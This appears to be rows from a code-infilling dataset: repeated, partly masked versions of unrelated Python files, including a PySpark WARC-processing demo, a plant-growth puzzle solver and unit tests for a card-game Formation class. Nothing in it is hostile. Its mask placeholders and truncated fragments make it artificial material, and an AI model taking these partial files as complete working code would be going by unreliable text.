# Schema of AWS event
event_schema = {
'pathParameters':{
'type': 'dict',
'default': {},
'schema':{
'uid':{
'type': 'string',
'required': True,
},
}
}
} | null | null | [
0,
1,
2
] |
1,646 | fccdf75fe83ad8388c12a63555c4132181fd349a | <mask token>
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(
process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(
process_id, end_time, current_uri))
return process_id, current_uri
<mask token>
def quick_print(processid_uri: (int, str)) ->(int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
<mask token>
| <mask token>
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(
process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(
process_id, end_time, current_uri))
return process_id, current_uri
def trivial_filter(processid_uri: (int, str)) ->bool:
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@3 filter in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return True
def quick_print(processid_uri: (int, str)) ->(int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
<mask token>
| <mask token>
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(
process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(
process_id, end_time, current_uri))
return process_id, current_uri
def trivial_filter(processid_uri: (int, str)) ->bool:
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@3 filter in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return True
def quick_print(processid_uri: (int, str)) ->(int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
if __name__ == '__main__':
session: SparkSession = create_session(3, 'Wave exploration')
input_warc = (
'/Users/a/Desktop/Buch/CC-MAIN-20191013195541-20191013222541-00000.warc'
)
raw_records = extract_raw_records(input_warc, session)
warc_records = raw_records.flatMap(parse_raw_warc)
process_ids_rdd = warc_records.map(fall_asleep).filter(trivial_filter).map(
quick_print)
distinct_process_ids: List[Tuple[int, int]] = process_ids_rdd.distinct(
).collect()
print(distinct_process_ids)
| import os
import time
from datetime import datetime
from typing import List, Tuple
from pyspark.sql import SparkSession
from Chapter01.utilities01_py.helper_python import create_session
from Chapter02.utilities02_py.domain_objects import WarcRecord
from Chapter02.utilities02_py.helper_python import extract_raw_records, parse_raw_warc
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(
process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(
process_id, end_time, current_uri))
return process_id, current_uri
def trivial_filter(processid_uri: (int, str)) ->bool:
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@3 filter in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return True
def quick_print(processid_uri: (int, str)) ->(int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(
new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
if __name__ == '__main__':
session: SparkSession = create_session(3, 'Wave exploration')
input_warc = (
'/Users/a/Desktop/Buch/CC-MAIN-20191013195541-20191013222541-00000.warc'
)
raw_records = extract_raw_records(input_warc, session)
warc_records = raw_records.flatMap(parse_raw_warc)
process_ids_rdd = warc_records.map(fall_asleep).filter(trivial_filter).map(
quick_print)
distinct_process_ids: List[Tuple[int, int]] = process_ids_rdd.distinct(
).collect()
print(distinct_process_ids)
| import os
import time
from datetime import datetime
from typing import List, Tuple
from pyspark.sql import SparkSession
from Chapter01.utilities01_py.helper_python import create_session
from Chapter02.utilities02_py.domain_objects import WarcRecord
from Chapter02.utilities02_py.helper_python import extract_raw_records, parse_raw_warc
def fall_asleep(record: WarcRecord):
current_uri: str = record.target_uri
start_time = str(datetime.now())
process_id = str(os.getpid())
print('@@1 falling asleep in process {} at {} processing {}'.format(process_id, start_time, current_uri))
time.sleep(5)
end_time = str(datetime.now())
print('@@2 awakening in process {} at {} processing {}'.format(process_id, end_time, current_uri))
return process_id, current_uri
def trivial_filter(processid_uri: (int, str)) -> bool:
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@3 filter in process {} at {} processing {}'.format(new_process_id, timepoint, processid_uri[1]))
return True
def quick_print(processid_uri: (int, str)) -> (int, int):
new_process_id = str(os.getpid())
timepoint = str(datetime.now())
print('@@4 map2 in process {} at {} processing {}'.format(new_process_id, timepoint, processid_uri[1]))
return processid_uri[0], new_process_id
if __name__ == "__main__":
session: SparkSession = create_session(3, "Wave exploration")
input_warc = "/Users/a/Desktop/Buch/CC-MAIN-20191013195541-20191013222541-00000.warc" # ToDo: Change path
raw_records = extract_raw_records(input_warc, session)
warc_records = raw_records \
.flatMap(parse_raw_warc)
process_ids_rdd = warc_records\
.map(fall_asleep)\
.filter(trivial_filter)\
.map(quick_print)
distinct_process_ids: List[Tuple[int, int]] = process_ids_rdd.distinct().collect()
print(distinct_process_ids)
| [
2,
3,
4,
5,
6
] |
1,647 | 27f001f4e79291825c56642693894375fef3e66a | <mask token>
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search('initial state:\\s([\\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile('([\\.#]{5})\\s=>\\s([\\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state) - 3:
curr_str = initial_state[i - 2:i + 3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
<mask token>
| <mask token>
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search('initial state:\\s([\\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile('([\\.#]{5})\\s=>\\s([\\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state) - 3:
curr_str = initial_state[i - 2:i + 3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
<mask token>
for c in state:
if c == '#':
break
start += 1
<mask token>
while gen < 1000:
start, state = apply_gen(state, rules, start)
total = sum_plants(state, start)
diff = total - previos
gen += 1
if diff == prev_diff:
same_diff_count += 1
if same_diff_count == 100:
break
previos = total
prev_diff = diff
<mask token>
print(solution)
| <mask token>
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search('initial state:\\s([\\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile('([\\.#]{5})\\s=>\\s([\\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state) - 3:
curr_str = initial_state[i - 2:i + 3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
state, rules = read_input()
start = 0
for c in state:
if c == '#':
break
start += 1
gen = 0
start_idx = -2
previos = sum_plants(state, start)
prev_diff = 0
same_diff_count = 0
while gen < 1000:
start, state = apply_gen(state, rules, start)
total = sum_plants(state, start)
diff = total - previos
gen += 1
if diff == prev_diff:
same_diff_count += 1
if same_diff_count == 100:
break
previos = total
prev_diff = diff
b = total - diff * gen
solution = diff * 50000000000 + b
print(solution)
| import re
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search('initial state:\\s([\\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile('([\\.#]{5})\\s=>\\s([\\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state) - 3:
curr_str = initial_state[i - 2:i + 3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
state, rules = read_input()
start = 0
for c in state:
if c == '#':
break
start += 1
gen = 0
start_idx = -2
previos = sum_plants(state, start)
prev_diff = 0
same_diff_count = 0
while gen < 1000:
start, state = apply_gen(state, rules, start)
total = sum_plants(state, start)
diff = total - previos
gen += 1
if diff == prev_diff:
same_diff_count += 1
if same_diff_count == 100:
break
previos = total
prev_diff = diff
b = total - diff * gen
solution = diff * 50000000000 + b
print(solution)
| import re
def read_input():
with open('../input/day12.txt') as f:
lines = f.readlines()
m = re.search(r'initial state:\s([\.#]+)', lines[0])
initial_state = m.groups()[0]
prog = re.compile(r'([\.#]{5})\s=>\s([\.#])')
rules = []
for i in range(2, len(lines)):
m = prog.search(lines[i])
groups = m.groups()
if groups[1] == '#':
rules.append((groups[0], groups[1]))
return initial_state, rules
def apply_gen(initial_state, rules, start):
next_state = []
initial_state = '....' + initial_state.strip('.') + '....'
set_start_idx = False
i = 2
while i <= len(initial_state)-3:
curr_str = initial_state[i-2:i+3]
rule_matches = None
for r in rules:
if curr_str == r[0]:
rule_matches = r
break
if rule_matches:
if not set_start_idx:
start_idx = i - 4
set_start_idx = True
next_state.append(rule_matches[1])
else:
next_state.append('.')
i += 1
return start + start_idx, ''.join(next_state).strip('.')
def sum_plants(state, start):
i = start
plant_count = 0
for c in state:
if c == '#':
plant_count += i
i += 1
return plant_count
state, rules = read_input()
start = 0
for c in state:
if c == '#':
break
start += 1
gen = 0
start_idx = -2
previos = sum_plants(state, start)
prev_diff = 0
same_diff_count = 0
while gen < 1000:
start, state = apply_gen(state, rules, start)
total = sum_plants(state, start)
diff = total-previos
gen += 1
if diff == prev_diff:
same_diff_count += 1
if same_diff_count == 100:
break
previos = total
prev_diff = diff
b = total - diff*gen
solution = diff * 50000000000 + b
print(solution) | [
3,
4,
5,
6,
7
] |
1,648 | 0ce69b7ce99b9c01892c240d5b268a9510af4503 | <mask token>
class TestFormation(unittest.TestCase):
<mask token>
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y'),
(3, 'R'), (5, 'G')])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, 'R'), (9, 'Y'), (8, 'R')])
self.assertEquals((8, 9, 10), formation.get_numbers())
<mask token>
<mask token>
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'R'), (2, 'R'), (3,
'R')])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (4,
'G')])))
self.assertFalse(Formation([(5, 'R'), (1, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'B'), (3, 'B'), (4,
'B')])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'G')])))
<mask token>
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'B')])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'P'), (1, 'B'), (1,
'O')])))
self.assertFalse(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'P'), (2, 'B'), (2,
'O')])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, 'R'), (2, 'R'), (5, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
self.assertFalse(Formation([(6, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (3,
'G')])))
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(4, 'B'), (2, 'B'), (3,
'G')])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, 'R'), (4, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (4, 'G'), (3,
'B')])))
self.assertFalse(Formation([(1, 'R'), (2, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(4, 'G'), (2, 'G'), (3,
'B')])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(2, 'R'), (2, 'G'), (2, 'B')]))
)
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(1, 'Y'), (1, 'R'), (1, 'B')]))
)
self.assertFalse(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(2, 'P'), (2, 'G'), (2, 'O')]))
)
<mask token>
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (5, 'G'), (2, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (6, 'G'), (2, 'G')]))
)
<mask token>
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(3, 'G'), (1, 'G'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'Y'), (2, 'B'), (3, 'B')]))
)
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, 'G'), (3, 'B'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (9, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(1, 'G'), (1, 'R'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'P'), (8, 'P'), (3, 'O')]))
)
| <mask token>
class TestFormation(unittest.TestCase):
<mask token>
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y'),
(3, 'R'), (5, 'G')])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, 'R'), (9, 'Y'), (8, 'R')])
self.assertEquals((8, 9, 10), formation.get_numbers())
def test_can_get_formation_colors_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(('R', 'Y', 'R'), formation.get_colors())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(('G', 'Y', 'R'), formation.get_colors())
def test_can_get_max_number(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(3, formation.get_max_number())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(10, formation.get_max_number())
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'R'), (2, 'R'), (3,
'R')])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (4,
'G')])))
self.assertFalse(Formation([(5, 'R'), (1, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'B'), (3, 'B'), (4,
'B')])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'G')])))
<mask token>
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'B')])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'P'), (1, 'B'), (1,
'O')])))
self.assertFalse(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'P'), (2, 'B'), (2,
'O')])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, 'R'), (2, 'R'), (5, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
self.assertFalse(Formation([(6, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (3,
'G')])))
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(4, 'B'), (2, 'B'), (3,
'G')])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, 'R'), (4, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (4, 'G'), (3,
'B')])))
self.assertFalse(Formation([(1, 'R'), (2, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(4, 'G'), (2, 'G'), (3,
'B')])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(2, 'R'), (2, 'G'), (2, 'B')]))
)
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(1, 'Y'), (1, 'R'), (1, 'B')]))
)
self.assertFalse(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(2, 'P'), (2, 'G'), (2, 'O')]))
)
<mask token>
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (5, 'G'), (2, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (6, 'G'), (2, 'G')]))
)
def test_greater_than_check_battalion_and_skirmish(self):
self.assertTrue(Formation([(3, 'G'), (6, 'G'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (3, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(3, 'G'), (1, 'G'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'Y'), (2, 'B'), (3, 'B')]))
)
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, 'G'), (3, 'B'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (9, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(1, 'G'), (1, 'R'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'P'), (8, 'P'), (3, 'O')]))
)
| <mask token>
class TestFormation(unittest.TestCase):
def test_formation_with_less_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y')])
def test_formation_with_more_than_three_cards_is_considered_invalid(self):
self.assertRaisesRegexp(FormationInvalidError,
'Formation must have 3 cards', Formation, [(1, 'R'), (2, 'Y'),
(3, 'R'), (5, 'G')])
def test_can_get_formation_numbers_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals((1, 2, 3), formation.get_numbers())
formation = Formation([(10, 'R'), (9, 'Y'), (8, 'R')])
self.assertEquals((8, 9, 10), formation.get_numbers())
def test_can_get_formation_colors_in_sorted_fashion(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(('R', 'Y', 'R'), formation.get_colors())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(('G', 'Y', 'R'), formation.get_colors())
def test_can_get_max_number(self):
formation = Formation([(1, 'R'), (3, 'Y'), (2, 'R')])
self.assertEquals(3, formation.get_max_number())
formation = Formation([(10, 'G'), (9, 'Y'), (8, 'R')])
self.assertEquals(10, formation.get_max_number())
def test_formation_equality_with_self(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'R'), (2, 'R'), (3,
'R')])))
def test_formation_equality_with_wedge_and_host(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (4,
'G')])))
self.assertFalse(Formation([(5, 'R'), (1, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'B'), (3, 'B'), (4,
'B')])))
def test_formation_equality_with_two_wedges(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'G')])))
<mask token>
def test_formation_equality_with_wedge_and_skirmish(self):
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (2, 'G'), (3,
'B')])))
def test_formation_equality_with_two_phalanxes(self):
self.assertTrue(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'P'), (1, 'B'), (1,
'O')])))
self.assertFalse(Formation([(1, 'R'), (1, 'G'), (1, 'Y')]).
is_equivalent_in_strength(Formation([(2, 'P'), (2, 'B'), (2,
'O')])))
def test_formation_equality_with_two_battalions(self):
self.assertTrue(Formation([(3, 'R'), (2, 'R'), (5, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
self.assertFalse(Formation([(6, 'R'), (2, 'R'), (3, 'R')]).
is_equivalent_in_strength(Formation([(5, 'B'), (2, 'B'), (3,
'B')])))
def test_formation_equality_with_two_skirmishes(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(1, 'B'), (2, 'B'), (3,
'G')])))
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'Y')]).
is_equivalent_in_strength(Formation([(4, 'B'), (2, 'B'), (3,
'G')])))
def test_formation_equality_with_two_hosts(self):
self.assertTrue(Formation([(1, 'R'), (4, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(1, 'G'), (4, 'G'), (3,
'B')])))
self.assertFalse(Formation([(1, 'R'), (2, 'Y'), (3, 'R')]).
is_equivalent_in_strength(Formation([(4, 'G'), (2, 'G'), (3,
'B')])))
def test_greater_than_check_two_wedges(self):
self.assertTrue(Formation([(4, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
self.assertFalse(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(1, 'R'), (2, 'R'), (3, 'R')]))
)
def test_greater_than_check_wedge_and_phalanx(self):
self.assertTrue(Formation([(1, 'R'), (2, 'R'), (3, 'R')]).
is_greater_strength_than(Formation([(2, 'R'), (2, 'G'), (2, 'B')]))
)
def test_greater_than_check_two_phalanxes(self):
self.assertTrue(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(1, 'Y'), (1, 'R'), (1, 'B')]))
)
self.assertFalse(Formation([(2, 'Y'), (2, 'R'), (2, 'B')]).
is_greater_strength_than(Formation([(2, 'P'), (2, 'G'), (2, 'O')]))
)
<mask token>
def test_greater_than_check_two_battalions(self):
self.assertTrue(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (5, 'G'), (2, 'G')]))
)
self.assertFalse(Formation([(1, 'G'), (3, 'G'), (8, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (6, 'G'), (2, 'G')]))
)
def test_greater_than_check_battalion_and_skirmish(self):
self.assertTrue(Formation([(3, 'G'), (6, 'G'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (3, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_skirmishes(self):
self.assertTrue(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(3, 'G'), (1, 'G'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (2, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'Y'), (2, 'B'), (3, 'B')]))
)
def test_greater_than_check_skirmish_and_host(self):
self.assertTrue(Formation([(1, 'G'), (3, 'B'), (2, 'G')]).
is_greater_strength_than(Formation([(4, 'G'), (9, 'G'), (5, 'B')]))
)
def test_greater_than_check_two_hosts(self):
self.assertTrue(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(1, 'G'), (1, 'R'), (2, 'Y')]))
)
self.assertFalse(Formation([(4, 'G'), (8, 'G'), (3, 'Y')]).
is_greater_strength_than(Formation([(4, 'P'), (8, 'P'), (3, 'O')]))
)
| import unittest
from battleline.model.Formation import Formation, FormationInvalidError
class TestFormation(unittest.TestCase):
